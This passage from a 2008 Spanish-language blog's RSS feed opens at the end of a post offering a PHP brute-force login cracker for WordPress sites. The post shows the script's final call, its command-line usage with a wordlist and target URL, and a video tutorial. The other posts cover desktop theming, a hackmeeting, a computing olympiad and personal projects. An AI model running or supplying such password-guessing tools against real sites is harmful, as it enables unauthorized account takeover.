<div class="de1">crackSite<span class="br0">&#40;</span><span class="re0">$argv</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span>, <span class="re0">$argv</span><span class="br0">&#91;</span><span class="nu0">2</span><span class="br0">&#93;</span>, <span class="re0">$argv</span><span class="br0">&#91;</span><span class="nu0">3</span><span class="br0">&#93;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1"><span class="kw2">?&gt;</span></div>
</li>
</ol>
</div>
</blockquote>
<p>Este script esta diseñado para correrlo desde la linea de comandos (<em>php-cli</em>) y su modo de uso es el siguiente:</p>
<blockquote><p>$ php wp_cracker.php wordlist.txt http://sitio.com/wp-login.php Username</p></blockquote>
<p>Notese que el script en ningun momento valida datos de entrada y salida, por lo que depende de la persona que lo ejecute que los parametros esten bien. Se ha probado este script con algunos sitios y ha funcionado, puede que para otros sitios sea necesario hacer algunas modificaciones. El primer parametro corresponde al fichero que contiene nuestro diccionario de palabras, el segundo a la URL que el script debe hacer post y el tercero al usuario.<br />
Lo unico que debemos saber es el nombre de usuario que existe en el registro del sitio. Para intentar ingresar a otros sitios es necesario modificar el codigo fuente y cambiar los nombres de los campos.</p>
<p><strong>Requerimientos:</strong> Curl y PHP.</p>
<p><strong>Video tutorial:<br />
</strong></p>
<p style="text-align: center"><!-- Smart Youtube --><span class="youtube"><object type="application/x-shockwave-flash" width="480" height="360" data="http://www.youtube.com/v/CMfxsGQOtd8&amp;rel=1&amp;color1=d6d6d6&amp;color2=f0f0f0&amp;border=&amp;fs=1&amp;autoplay=&amp;ap=%2526fmt%3D18"><param name="movie" value="http://www.youtube.com/v/CMfxsGQOtd8&amp;rel=1&amp;color1=d6d6d6&amp;color2=f0f0f0&amp;border=&amp;fs=1&amp;autoplay=&amp;ap=%2526fmt%3D18"></param><param name="allowFullScreen" value="true"></param><param name="wmode" value="transparent" /></object></span></p>
<p><strong>Descargar video:</strong><br />
<a href="http://www.hardmodding.net/storage/web_login_cracker.avi">Mirror 1: Hardmodding</a> (5M)</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/10/04/web-login-por-fuerza-bruta/feed/</wfw:commentRss>
<enclosure url="http://www.hardmodding.net/storage/web_login_cracker.avi" length="2899240" type="video/x-msvideo" />
		</item>
		<item>
		<title>Configurando fluxbox</title>
		<link>http://blog.zerial.org/2008/10/01/configurando-fluxbox/</link>
		<comments>http://blog.zerial.org/2008/10/01/configurando-fluxbox/#comments</comments>
		<pubDate>Thu, 02 Oct 2008 03:19:11 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/10/01/configurando-fluxbox/</guid>
		<description><![CDATA[Por fin me di el trabajo de enchular un poco la apariencia fisica de fluxbox en mi laptop.
Screenshot:
  
&#160;
Software:

Entorno grafico: Fluxbox 1.1.1
Barra de iconos: wbar
Reproductor multimedia: mplayer
Barra lateral derecha: GKrellm
Navegador: Firefox (Gran Paradiso)
Cliente IM: emesene
Terminal: urxvt (rxvt unicode)
Sistema operativo: Archlinux

Como lograr la transparencia
La transparencia del menu, taskbar y titlebar se propia de fluxbox y [...]]]></description>
			<content:encoded><![CDATA[<p>Por fin me di el trabajo de <em>enchular</em> un poco la apariencia fisica de <a href="http://fluxbox.org">fluxbox</a> en mi laptop.</p>
<p><strong>Screenshot:</strong></p>
<p style="text-align: center"> <a href="http://blog.zerial.org/wp-content/uploads/2008/10/fb2.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/10/fb2_thumb.jpg" alt="fluxbox new look" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/10/fb.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/10/fb_thumb.jpg" alt="fluxbox new loook!" /></a></p>
<p style="text-align: center" align="left">&nbsp;</p>
<p><strong>Software:</strong></p>
<ul>
<li>Entorno grafico: Fluxbox 1.1.1</li>
<li>Barra de iconos: wbar</li>
<li>Reproductor multimedia: mplayer</li>
<li>Barra lateral derecha: GKrellm</li>
<li>Navegador: Firefox (Gran Paradiso)</li>
<li>Cliente IM: emesene</li>
<li>Terminal: urxvt (rxvt unicode)</li>
<li>Sistema operativo: Archlinux</li>
</ul>
<p><strong>Como lograr la transparencia</strong><br />
La transparencia del menu, taskbar y titlebar se propia de fluxbox y se puede configurar haciendo clic derecho, Configuracion -&gt; Transparecnias. La transparencia de GKRellm es un theme que se llama invisible.<br />
Las ventanas transparentes se logran gracias a <strong>transset</strong> (hay que tener activado Composite en la configuracion de Xorg, salvo las tarjetas intel que viene incormorado en el modulo intel).</p>
<p><strong>Sombras y efectos<br />
</strong>Las sombras y los efectos tipo <em>fade-out/in</em> se logran usando <strong>xcompmgr</strong>.</p>
<p>Si te gusto el estilo que estoy usando y como lo tengo configurado, entocnes debes seguir leyendo.</p>
<p> <a href="http://blog.zerial.org/2008/10/01/configurando-fluxbox/#more-91" class="more-link">(leer m&aacute;s&#8230;)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/10/01/configurando-fluxbox/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hackmeeting &#8216;08</title>
		<link>http://blog.zerial.org/2008/09/02/hackmeeting-08/</link>
		<comments>http://blog.zerial.org/2008/09/02/hackmeeting-08/#comments</comments>
		<pubDate>Tue, 02 Sep 2008 22:10:27 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Interes general]]></category>

		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/09/02/hackmeeting-08/</guid>
		<description><![CDATA[Ya empezamos la organizacion y coordinacion para realizar el HM (Hackmeeting) correspondiente al año 2008, al igual que en años anteriores (hackPrendiz) cerca de esta fecha se reunen grupos de personas a organizar lo que se denomina &#8220;Encuentro de Hackers&#8221;, una instancia donde se reunen distintos grupos sociales y personas a compartir y a aprender.
0lafo [...]]]></description>
			<content:encoded><![CDATA[<p>Ya empezamos la organizacion y coordinacion para realizar el HM (Hackmeeting) correspondiente al año 2008, al igual que en años anteriores (<a href="http://blog.zerial.org/2007/10/21/hackprendiz-hm2007/">hackPrendiz</a>) cerca de esta fecha se reunen grupos de personas a organizar lo que se denomina &#8220;Encuentro de Hackers&#8221;, una instancia donde se reunen distintos grupos sociales y personas a compartir y a aprender.</p>
<p><a href="http://0castro.blogspot.com/">0lafo</a> redacto una carta de invitacion y motivacion para que las personas empiecen a coordinarse para lograr que este encuentro se realice con exito. Las fechas tentativas son a mediados de Noviembre y se espera que dure dos dias (un fin de semana). Como todos los años, esperamos que llegue gente de distintos lugares y con distintas cosas que aportar.</p>
<blockquote><p>   	<meta http-equiv="CONTENT-TYPE" content="text/html; charset=utf-8" /> 	<title></title> 	<meta name="GENERATOR" content="OpenOffice.org 2.4  (Linux)" /></p>
<style type="text/css"> 	<!-- 		@page { size: 8.5in 11in; margin: 0.79in } 		P { margin-bottom: 0.08in } 	--> 	</style>
<p>Convocatoria hackmeeting</p>
<p>Este mensaje es una invitación abierta para todos los usuarios, personas entusiastas de las tecnologías libres, libertad de la información y publico en general. De  Organizar  el hackmeeting Chile 2008, proponiendo y plagiando el trabajo, actividades y difusión del evento. como viene siendo habitual, desarrollar una red de actividades y encuentros entorno al hacktivismo, el aprendizaje, la informática y telemática y sus dimensiones sociales; en un fin de semana en el que se manifiesta la libertad  de compartir, que es el hackmeeting (HM).</p>
<p>Para la organización y consulta se a dispuesto la siguiente lista de correo:</p>
<p><a href="https://www.entodaspartes.org/mailman/listinfo/hackmeeting" target="_blank">https://www.entodaspartes.org/mailman/listinfo/hackmeeting</a></p>
<p>El HM es un evento participativo en el que la dicotomía organizador/asistente se diluyen en la necesidad de autogestionar el encuentro colectivamente. Entendemos el HackMeeting como una red de actividades auto organizadas (talleres, charlas, mesas redondas, exposiciones, foros, etc.) que cualquier persona es libre de coordinar, presentar, difundir dentro del hackmeeting.</p></blockquote>
<p>Pronto estara disponible una web con mas informacion, por mientras pueden unirse a la lista de discusion para la organizacion y corrdinacion.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/09/02/hackmeeting-08/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Olimpiadas Nacionales de Informatica (ONI)</title>
		<link>http://blog.zerial.org/2008/05/27/olimpiadas-nacionales-de-informatica-oni/</link>
		<comments>http://blog.zerial.org/2008/05/27/olimpiadas-nacionales-de-informatica-oni/#comments</comments>
		<pubDate>Tue, 27 May 2008 18:53:19 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Mis cosas]]></category>

		<category><![CDATA[Programación]]></category>

		<category><![CDATA[Interes general]]></category>

		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/05/27/olimpiadas-nacionales-de-informatica-oni/</guid>
		<description><![CDATA[ La Olimpiada Nacional en Informática (ONI) es el concurso de informática para los estudiantes chilenos que se encuentren cursando enseñanza media durante el presente año o recién egresados. Los concursantes compiten individualmente, e intentan obtener la máxima puntuación resolviendo un conjunto de problemas informáticos durante las dos sesiones del concurso (online y presencial). Los [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><img src="http://blog.zerial.org/wp-content/uploads/2008/05/oni.jpg" alt="oni" /> La Olimpiada Nacional en Informática (ONI) es el concurso de informática para los estudiantes chilenos que se encuentren cursando enseñanza media durante el presente año o recién egresados. Los concursantes compiten individualmente, e intentan obtener la máxima puntuación resolviendo un conjunto de problemas informáticos durante las dos sesiones del concurso (online y presencial). Los problemas son algorítmicos y deben resolverse programando en un ordenador personal.</p>
<p align="justify"> La ONI se organiza en Chile bajo los auspicios de la Ilustre Municipalidad de Buin.</p>
<p align="justify">El principal objetivo de este proyecto es contribuir a la educación de los jóvenes incorporando la informática como una pieza fundamental en su desarrollo, y además reconocer a aquellos que demuestren talento en el área para orientarlos y apoyarlos en su futura formación.</p>
<p>La ONI se realizará el día 21 de Junio de 14:00 a 18:00 horas en su primera fase en línea y el día 19 de Julio en su fase presencial (y final). Esta última se llevará a cabo en la comuna de Buin. Para la fase presencial, aquellos participantes provenientes de regiones podrán alojarse en Buin con un día de anterioridad.</p>
<p>Los temas a tratar en la ONI son los siguientes:</p>
<p>Estructura de Datos<br />
Algoritmos de Ordenación<br />
Algoritmos de Búsqueda<br />
Grafos<br />
Programación Dinámica<br />
Mínimo Coste<br />
Backtracking</p>
<p align="justify">&nbsp;</p>
<p>Más info en <a href="http://www.onibuin.cl/" target="_blank"><span style="font-size: 10pt"><strong>onibuin</strong></span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/05/27/olimpiadas-nacionales-de-informatica-oni/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Taller/charla en el CDSL</title>
		<link>http://blog.zerial.org/2008/04/03/tallercharla-en-el-cdsl/</link>
		<comments>http://blog.zerial.org/2008/04/03/tallercharla-en-el-cdsl/#comments</comments>
		<pubDate>Fri, 04 Apr 2008 03:19:53 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Mis cosas]]></category>

		<category><![CDATA[Interes general]]></category>

		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/04/03/tallercharla-en-el-cdsl/</guid>
		<description><![CDATA[Se me ha invitado a dictar un taller o charla en el Centro de Difusion del Software Libre (CDSL) sobre el modelamiento de bases de datos utilizando herramientas libres. La fecha, que aun no esta decidida, sera mas o menos a principios de mayo y sera dictada en dos sesiones, una primera parte de Introduccion [...]]]></description>
			<content:encoded><![CDATA[<p>Se me ha invitado a dictar un taller o charla en el <a href="http://cdsl.cl">Centro de Difusion del Software Libre (CDSL)</a> sobre el modelamiento de bases de datos utilizando herramientas libres. La fecha, que aun no esta decidida, sera mas o menos a principios de mayo y sera dictada en dos sesiones, una primera parte de Introduccion conceptual a SQL y una segunda parte donde se enseñara a modelar una base de datos.<br />
El temario, la fecha y la hora aun no esta definido, pero a medida que pasen los dias ire actualizando la informacion que pueden encontrar en la siguiente direccion:</p>
<p><a href="http://wiki.cdsl.cl/doku.php/proyectos:intromodelamientodb">Wiki de tallers en el CDSL</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/04/03/tallercharla-en-el-cdsl/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Algunos proyectos &#8230;</title>
		<link>http://blog.zerial.org/2008/03/27/algunos-proyectos/</link>
		<comments>http://blog.zerial.org/2008/03/27/algunos-proyectos/#comments</comments>
		<pubDate>Thu, 27 Mar 2008 20:44:07 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Mis cosas]]></category>

		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/03/27/algunos-proyectos/</guid>
		<description><![CDATA[Hace algun tiempo que he estado integrandome y fundando algunos proyectos bastantes interesantes que me gustaria compartir:

Gibbio: Junto a Rodolfo Berrios comenzamos un proyecto patrocinado/auspiciado por Sergio Escoté, Gibbio es un proyecto de red social al mas estilo Yahoo! Answers o Askville de Amazon, en simples palabras es una Web 2.0 donde la gente podra [...]]]></description>
			<content:encoded><![CDATA[<p>Hace algun tiempo que he estado integrandome y fundando algunos proyectos bastantes interesantes que me gustaria compartir:</p>
<ol>
<li><a href="http://gibbio.com">Gibbio</a>: Junto a <a href="http://rodolfoberrios.com">Rodolfo Berrios</a> comenzamos un proyecto patrocinado/auspiciado por <a href="http://sergioescote.com">Sergio Escoté</a>, Gibbio es un proyecto de red social al mas estilo Yahoo! Answers o Askville de Amazon, en simples palabras es una Web 2.0 donde la gente podra compartir (buscar/encontrar) lo que necesite en base a preguntas y respuestas <em>tageadas</em> y categorizadas bajo un criterio colectivo, donde cada pregunta y respuesta podra ser valorada segun el criterio de quien la este leyendo. La idea es lanzar una beta en poco tiempo mas.</li>
<li><a href="http://hackreta.org">Hackreta</a>:  Hace mas o menos un año que me integre a Hackreta Hacklab y desde ese entonces han pasado muchas cosas, gente que se ah retirado, gente nueva &#8230; Actualmente estamos intentando sacar el Hacklab adelante, de apoco vamos trabajando y uniendo fuerzas los antiguos y los nuevos. Poco a poco nos vamos planteando metas a corto plazo para poder realizarlas y evaluamos como vamos avanzando, nuestro proximo objetivo es dar una buena presentacion/impresion en el Flisol (Festival Latinoamericano de instalacion de Software Libre) de este año mostrando algunas cosas que realizaremos como un Multimedia Center entre otras cosas.</li>
<li><a href="http://kernelhouse.org">KernelHouse</a>: Este proyecto lleva solo algunos meses en pie y es algo que suena muy bonito pero que cuesta bastante llevar adelante. Kernel de núcleo y House de casa, la idea es formar una <em>comunidad</em> de organizaciones sin fines de lucro y libres, en esta casa existen varios colectivos o grupos <em>sociales</em> y ademas, muchas ideas creativas e integrantes. Actualmente en esta casa se hacen talleres/clases de Tango, lugar de ensayo para la compañia de teatro <em>La manojo Teatro</em>, el Hacklab Hackreta y recientemente un estudio de grabacion llamado <em>Empty Records</em> conocido como El lado oscuro. KernelHouse es una organizacion centralizada de todos los colectivos que participan en la casa de forma independiente.</li>
<li><a herf="http://noubuntu.org">Noubuntu</a>: Aunque ya he recibido la critica de muchos (y algunas criticas muy destructivas), junto con corrideat decidimos continuar con esta ideologia y pensamiento respecto a lo que genera una distrbucion Linux tipo Ubuntu. Migramos el servidor, nos mudamos a Wordpress y lanzamos con mas fuerzas que nunca el nuevo sitio y ya hemos tenido varias visitas y varias criticas constructivas y destructivas.</li>
<li><a href="http://chevereto.com">Chevereto</a>: Hace un tiempo me uní a este proyecto y actualmente soy el unico desarrollador, por lo que el avance avanza muy lento (tambien ocupo mi tiempo en otras cosas). Es un proyecto, tambien junto a Rodolfo Berrios, que trata de crear un motor de hosting de imagenes gratuito y libre, asi como existe Imageshack y otros hosting de imagenes, la idea es que este sea descargable y <em>montable </em>en cualquier servidor o pc. Actualmente es el motor de Godlike.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/03/27/algunos-proyectos/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Fin de semana en el Hacklab: La antena</title>
		<link>http://blog.zerial.org/2008/02/18/fin-de-semana-en-el-hacklab-la-antena/</link>
		<comments>http://blog.zerial.org/2008/02/18/fin-de-semana-en-el-hacklab-la-antena/#comments</comments>
		<pubDate>Mon, 18 Feb 2008 13:29:33 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Mis cosas]]></category>

		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/02/18/fin-de-semana-en-el-hacklab-la-antena/</guid>
		<description><![CDATA[El fin de semana recien pasado nos reunimos en el Hacklab para rearmar la antena y una estructura que nos permita dejarla fija.
   
Largas horas en el techo de la casa, buscando señales, fijando la antena y por obviamente tomando cerveza. Logramos conectarnos a una señal que según estudios anteriores era de 5mbps, [...]]]></description>
			<content:encoded><![CDATA[<p>El fin de semana recien pasado nos reunimos en el <a href="http://hackreta.org">Hacklab</a> para rearmar la antena y una estructura que nos permita dejarla fija.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06772_595.jpg" title="dsc06772_595.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06772_595.thumbnail.jpg" alt="dsc06772_595.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06778_595.jpg" title="dsc06778_595.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06778_595.thumbnail.jpg" alt="dsc06778_595.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06784_595.jpg" title="dsc06784_595.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06784_595.thumbnail.jpg" alt="dsc06784_595.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06811_595.jpg" title="dsc06811_595.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06811_595.thumbnail.jpg" alt="dsc06811_595.jpg" /></a></p>
<p>Largas horas en el techo de la casa, buscando señales, fijando la antena y por obviamente tomando cerveza. Logramos conectarnos a una señal que según estudios anteriores era de 5mbps, con una &#8220;potencia&#8221; entre -76 y -82dBm logramos conectarnos y descargar a grandes velocidades. En un principio las descargas no bajaban de los 60kb/s y llegando a un tope de 140kb/s, poco a poco fuimos moviendo la antena y apuntandola mejor hasta lograr una conexion optima, descargando a una velocidad entre 250 y 300kb/s. Ya estabamos satisfechos y bajamos al laboratorio a actualizar los PC, a instalar, en fin, a &#8220;aprovechar&#8221; nuestro gran ancho de banda.<br />
Durante la noche logramos logramos un record de descarga a <strong>620kb/s </strong>, conectados con una velocidad de subida y bajada de 6000kbps.<br />
Asi quedo la antena:</p>
<p style="text-align: center"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06858_595.jpg" alt="dsc06858_595.jpg" /><br />
<a href="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06860_595.jpg" title="dsc06860_595.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06860_595.thumbnail.jpg" alt="dsc06860_595.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06861_595.jpg" title="dsc06861_595.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/dsc06861_595.thumbnail.jpg" alt="dsc06861_595.jpg" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/02/18/fin-de-semana-en-el-hacklab-la-antena/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Wallpapers</title>
		<link>http://blog.zerial.org/2008/02/15/wallpapers/</link>
		<comments>http://blog.zerial.org/2008/02/15/wallpapers/#comments</comments>
		<pubDate>Fri, 15 Feb 2008 13:44:18 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Interes general]]></category>

		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/02/15/wallpapers/</guid>
		<description><![CDATA[He recolectado algunos wallpapers para compartir con ustedes, espero que les gusten:
  
&#160;
 
 
&#160;
&#160;
 
 


 
 

 
 
 
Pueden encontrar más wallpapers buscando allintitle: &#8220;Index of /wallpapers&#8221; en nuestro amigo Google.
]]></description>
			<content:encoded><![CDATA[<p>He recolectado algunos wallpapers para compartir con ustedes, espero que les gusten:</p>
<p align="center"><a href="http://blog.zerial.org/wp-content/uploads/2008/02/3dhuman007.jpg" title="3dhuman007.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/3dhuman007.thumbnail.jpg" alt="3dhuman007.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/3dhuman009.jpg" title="3dhuman009.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/3dhuman009.thumbnail.jpg" alt="3dhuman009.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/abstrac034.jpg" title="abstrac034.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/abstrac034.thumbnail.jpg" alt="abstrac034.jpg" /></a></p>
<p align="center">&nbsp;</p>
<p align="center"><a href="http://blog.zerial.org/wp-content/uploads/2008/02/abstrac038.jpg" title="abstrac038.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/abstrac038.thumbnail.jpg" alt="abstrac038.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/abstrac042.jpg" title="abstrac042.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/abstrac042.thumbnail.jpg" alt="abstrac042.jpg" /></a></p>
<p align="center"> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/ie_vs_ff.jpg" title="ie_vs_ff.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/ie_vs_ff.thumbnail.jpg" alt="ie_vs_ff.jpg" /></a></p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><a href="http://blog.zerial.org/wp-content/uploads/2008/02/ciber-debian.jpg" title="ciber-debian.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/ciber-debian.thumbnail.jpg" alt="ciber-debian.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian038.jpg" title="debian038.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian038.thumbnail.jpg" alt="debian038.jpg" /></a><br />
<a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian045.jpg" title="debian045.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian045.thumbnail.jpg" alt="debian045.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian_powerful_and_safe.png" title="debian_powerful_and_safe.png"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian_powerful_and_safe.thumbnail.png" alt="debian_powerful_and_safe.png" /></a><br />
<a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian064.jpg" title="debian064.jpg"><br />
</a></p>
<p align="center"><a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian1600.png" title="debian1600.png"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian1600.thumbnail.png" alt="debian1600.png" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian_moment.jpg" title="debian_moment.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian_moment.thumbnail.jpg" alt="debian_moment.jpg" /></a><br />
<a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian_simpler_is_better.jpg" title="debian_simpler_is_better.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian_simpler_is_better.thumbnail.jpg" alt="debian_simpler_is_better.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/debian064.jpg" title="debian064.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/debian064.thumbnail.jpg" alt="debian064.jpg" /></a>
</p>
<p align="center"><a href="http://blog.zerial.org/wp-content/uploads/2008/02/opensuse01.jpg" title="opensuse01.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/opensuse01.thumbnail.jpg" alt="opensuse01.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/opensuse02.jpg" title="opensuse02.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/opensuse02.thumbnail.jpg" alt="opensuse02.jpg" /></a></p>
<p align="center"><a href="http://blog.zerial.org/wp-content/uploads/2008/02/linux010.jpg" title="linux010.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/linux010.thumbnail.jpg" alt="linux010.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/crosscode.jpg" title="crosscode.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/crosscode.thumbnail.jpg" alt="crosscode.jpg" /></a><br />
<a href="http://blog.zerial.org/wp-content/uploads/2008/02/tux004.jpg" title="tux004.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/tux004.thumbnail.jpg" alt="tux004.jpg" /></a> <a href="http://blog.zerial.org/wp-content/uploads/2008/02/tux01.jpg" title="tux01.jpg"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/tux01.thumbnail.jpg" alt="tux01.jpg" /></a></p>
<p>Pueden encontrar más wallpapers buscando <b><a herf="http://www.google.com/search?hl=es&amp;q=allintitle%3A+%22Index+of+%2Fwallpapers%22&amp;btnG=Buscar+con+Google&amp;meta=">allintitle: &#8220;Index of /wallpapers&#8221;</a></b> en nuestro amigo <a href="http://google.com">Google</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/02/15/wallpapers/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Chevereto</title>
		<link>http://blog.zerial.org/2008/02/14/chevereto/</link>
		<comments>http://blog.zerial.org/2008/02/14/chevereto/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 13:19:18 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Programación]]></category>

		<category><![CDATA[Interes general]]></category>

		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/02/14/chevereto/</guid>
		<description><![CDATA[Si alguna vez  pensaste en tener un hosting de imágenes corriendo en tu servidor con un script open source que te permite modificarlo como te dé la gana y compartir con personas de todo el mundo esta experiencia… Piensas  igual que nosotros.
Con esta frase se presenta el sitio en desarrollo de Chevereto , [...]]]></description>
			<content:encoded><![CDATA[<blockquote>Si alguna vez  pensaste en tener un hosting de imágenes corriendo en tu servidor con un script open source que te permite modificarlo como te dé la gana y compartir con personas de todo el mundo esta experiencia… Piensas  igual que nosotros.</p></blockquote>
<p>Con esta frase se presenta el <a href="http://chevereto.com">sitio en desarrollo de Chevereto</a> , un futuro sistema <em>libre</em> para el alojamiento de imagenes.</p>
<p style="text-align: center"><img src="http://blog.zerial.org/wp-content/uploads/2008/02/chevereto.gif" alt="chevereto’s logo" border="0" /></p>
<p>Ya deben conocer <a href="http://es.wikipedia.org/wiki/ImageShack">Imageshack</a> (<a href="http://imageshack.us">http://imageshack.us</a>) o <a href="http://godlike.cl">Godlike</a>, el primero un sitio popular a nivel mundial de almacenamiento de imagenes y el segundo un sitio Chileno que a menos de un año de vida se esta popularizando en distintos paises.<br />
<a href="http://wiki.chevereto.com">Chevereto es un sistema</a> que hace un par de meses se esta desarrollando pero que tambien hace mucho tiempo esta estancado y que ahora retomare con mucho mas animo. Espero poder tener lista una beta del sistema en menos de un mes, junto a <a href="http://rodolfo.godlike.cl">Rodolfo Berrios</a> (autor intelectual del asunto) y <a href="http://p0ns.org">Pons</a> (un desarrollador desmotivao&#8217;).</p>
<p> <a href="http://blog.zerial.org/2008/02/14/chevereto/#more-51" class="more-link">(leer m&aacute;s&#8230;)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/02/14/chevereto/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
